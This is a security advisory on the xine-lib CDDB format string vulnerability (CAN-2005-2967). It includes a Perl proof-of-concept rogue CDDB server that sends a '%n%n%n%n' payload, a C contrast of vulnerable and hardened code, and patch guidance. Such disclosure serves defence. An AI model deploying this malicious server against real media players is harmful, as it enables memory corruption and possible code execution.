Xine-Lib CDDB Information Remote Format String Vulnerability
Source: 岁月联盟
Date: 2005-10-13
xine xine-lib 1.1.0
xine xine-lib 1.0.2
xine xine-lib 1.0.1
xine xine-lib 1.0
xine xine-lib 0.9.13
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 15044
CVE(CAN) ID: CAN-2005-2967
xine is a free media player that supports many media formats.
When xine or gxine plays a CD, the program connects to a CDDB server to retrieve the disc's artist, band, song titles and so on, and then writes this information to a cache file. The xine-lib code that performs this step contains a format string vulnerability: text received from the server is used as a format string, so a malicious server response may allow remote execution of arbitrary code.
<* Source: Ulf Harnhammar (ulfh@update.uu.se)
Links: http://marc.theaimsgroup.com/?l=full-disclosure&m=112877511901802&w=2
http://security.gentoo.org/glsa/glsa-200510-08.xml
*>
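As an added illustration (this is not xine-lib's own code and is not part of the original advisory), the C snippet below contrasts the vulnerable pattern the description refers to, a server-supplied CDDB cache line passed to fprintf as the format, with the hardened form that keeps the format constant and passes the line as data, plus a defensive check a client can apply to CDDB metadata before storing it. The function names, the constructed sample line and the buffer helper are all assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: a "cddb read" reply line carrying printf directives,
 * of the kind a malicious CDDB server could return (assumption for the
 * example, not taken from any real server). */
static const char *const SAMPLE_LINE = "# %n%n%n%n";

/* VULNERABLE pattern (hypothetical, for contrast only): the server-controlled
 * line becomes the format string. "%n" makes printf write to memory and
 * "%s"/"%x" make it read it. Never called in this example. */
int cache_write_vulnerable(FILE *fp, const char *line)
{
    return fprintf(fp, line);
}

/* HARDENED pattern: the format is a compile-time constant and the untrusted
 * line is supplied as a "%s" argument, so every '%' in it is copied
 * literally. Returns the number of characters written (fprintf's result). */
int cache_write_line(FILE *fp, const char *line)
{
    return fprintf(fp, "%s\n", line);
}

/* Same hardening into a caller-provided buffer, so the output can be
 * inspected. Returns the length written, or -1 if the buffer is too small. */
int cache_format_line(char *out, size_t cap, const char *line)
{
    int n = snprintf(out, cap, "%s\n", line);
    if (n < 0 || (size_t)n >= cap)
        return -1;
    return n;
}

/* Defensive check for CDDB metadata: DTITLE/TTITLE/EXTD values have no
 * business containing printf directives, so any '%' that is not part of a
 * literal "%%" pair is flagged. Returns 1 if flagged, 0 otherwise. */
int cddb_line_has_format_directive(const char *line)
{
    for (const char *p = strchr(line, '%'); p; p = strchr(p + 1, '%')) {
        if (p[1] == '%') {   /* "%%" is a literal percent sign, not a directive */
            p++;
            continue;
        }
        return 1;            /* e.g. "%n", "%s", "%08x" or a trailing lone '%' */
    }
    return 0;
}

int main(void)
{
    char buf[64];
    int n = cache_format_line(buf, sizeof buf, SAMPLE_LINE);
    /* The payload is stored as plain text; nothing is interpreted. */
    printf("flagged=%d written=%d -> %s",
           cddb_line_has_format_directive(SAMPLE_LINE), n, buf);
    return 0;
}
```

The fix in the hardened functions is the same one applied to this class of bug generally: never let data from the network reach the format argument of the printf family. The directive check is an additional layer for the cache file, not a substitute for the constant format.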
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be harmful and is provided only for security research and teaching. Use at your own risk!
#!/usr/bin/perl --
# xine-cddb-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 8880;
$main::timeout = 5;

# *** SUBROUTINES ***

# Send one line to the client and echo it locally.
sub mysend($$)
{
  my $file = shift;
  my $str = shift;

  print $file "$str\n";
  print "SENT: $str\n";
} # sub mysend

# Read one line from the client, giving up after $main::timeout seconds.
sub myreceive($)
{
  my $file = shift;
  my $inp;

  eval
  {
    local $SIG{ALRM} = sub { die "alarm\n" };
    alarm $main::timeout;
    $inp = <$file>;
    alarm 0;
  };
  if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }

  # strip CR, LF and NUL bytes
  $inp =~ tr/\015\012\000//d;
  print "RECEIVED: $inp\n";
  $inp;
} # sub myreceive

# *** MAIN PROGRAM ***

{
  my $server = IO::Socket::INET->new( Proto     => 'tcp',
                                      LocalPort => $main::port,
                                      Listen    => SOMAXCONN,
                                      Reuse     => 1);
  die "can't set up server!\n" unless $server;

  while (my $client = $server->accept())
  {
    $client->autoflush(1);
    print 'connection from '.$client->peerhost."\n";

    mysend($client, '201 metaur CDDBP server v1.5PL2 ready at '.
                    scalar localtime);

    while (my $str = myreceive($client))
    {
      if ($str =~ m/^cddb hello ([^ ]+) ([^ ]+) (.+)$/i)
      {
        mysend($client, "200 Hello and welcome $1\@$2 running $3.");
        next;
      }
      if ($str =~ m/^proto (\d+)$/i)
      {
        mysend($client, "201 OK, CDDB protocol level now: $1");
        next;
      }
      if ($str =~ m/^cddb query ([0-9a-f]+)/i)
      {
        mysend($client, "200 rock $1 Exploiters / Formatted and Stringed");
        next;
      }
      if ($str =~ m/^cddb read ([a-z]+) ([0-9a-f]+)/i)
      {
        # the entry below is what the vulnerable client writes to its cache
        my $docum = <<HERE;
210 $1 $2 CD database entry follows (until terminating `.')
# %n%n%n%n
DISCID=$2
DTITLE=Exploiters / Formatted and Stringed
DYEAR=2005
DGENRE=Rock
TTITLE0=Format
TTITLE1=String
TTITLE2=Bug
EXTD= YEAR: 2005
EXTT0=
EXTT1=
EXTT2=
PLAYORDER=
.
HERE
        $docum =~ s|\s+$||s;
        mysend($client, $docum);
        next;
      }
      if ($str =~ m/^quit$/i)
      {
        mysend($client, '230 metaur Closing connection. Goodbye.');
        last;
      }
      mysend($client, '500 Unrecognized command.');
    } # while str=myreceive(client)

    close $client;
    print "closed\n\n\n";
  } # while client=server->accept()
}
Recommendations:
--------------------------------------------------------------------------------
Workaround:
* Disable CDDB lookups in the settings.
Vendor patches:
Gentoo
------
Gentoo has released a security advisory (GLSA-200510-08) and a corresponding patch for this issue:
GLSA-200510-08: xine-lib: Format string vulnerability
Link: http://security.gentoo.org/glsa/glsa-200510-08.xml
All xine-lib users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose media-libs/xine-lib